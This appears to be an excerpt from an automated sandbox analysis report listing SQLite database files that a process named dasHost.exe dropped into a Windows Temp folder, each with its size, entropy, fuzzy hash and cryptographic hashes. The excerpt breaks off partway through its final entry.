                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\9BmWjElVY7

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\9MGqXrK1gR

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\9bz4gn7vsa

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\AG6goUjxa5

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\AH1rx3cP3x

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Aben8hSynO

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\AdQRBgqW5B

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\AswWpn6hP1

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Aw5MGohJiU

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\B5Jr69xLQH

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\B6VCBT8hK0

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Bg8riikHmF

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\BiIPsSM6MA

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\BulGIJIRbJ

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\C0ZHLZv3Jr

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\CVcP6ERvM0

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\CnxqVK3uq6

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\DAU2nHomOG

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\DmRXf22bR3

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\EEzOtROMrX

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ESVDwUj1so

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\Ea7EOGm0tJ

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\F5RrczePZU

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\FHtviAbBff

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
